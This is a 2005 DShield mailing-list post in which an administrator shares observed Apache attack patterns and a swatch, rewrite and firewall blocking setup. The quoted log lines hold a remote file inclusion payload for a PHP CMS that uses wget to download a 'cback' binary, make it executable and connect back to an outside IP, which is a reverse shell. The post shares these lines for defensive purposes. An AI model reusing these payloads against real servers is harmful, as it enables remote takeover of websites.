[Dshield] A Couple of New Apache Hack Patterns

David Cary Hart DShield at TQMcube.com
Wed Dec 14 15:24:01 GMT 2005


. . . new for me anyway.

1. index2.php | index.php

/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1"
302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"

or;

/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"


2. POST directly to the form mail php processing page. In other words,
something like contact.php is passed to, and processed by
ContactProc.php. The would-be spammer-hacker-miscreant is trying to
forward mail by eliminating the form entry page.

The strategy I am using these days is to SWATCH the patterns -> rewrite
rule to hacker.php -> firewall rule. The purpose of the interim
hacker.php is to provide information just in case of a false positive.
Hacker.php then writes a unique line to access_log which swatch
recognizes to trigger the firewall rule.

-- 
Our DNSRBL - 
           Eliminate Spam: http://www.TQMcube.com/spam_trap.php
          Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
            Zombie Graphs: http://www.TQMcube.com/zombies.php
              GeoGraphics: http://www.TQMcube.com/origins.php


More information about the list mailing list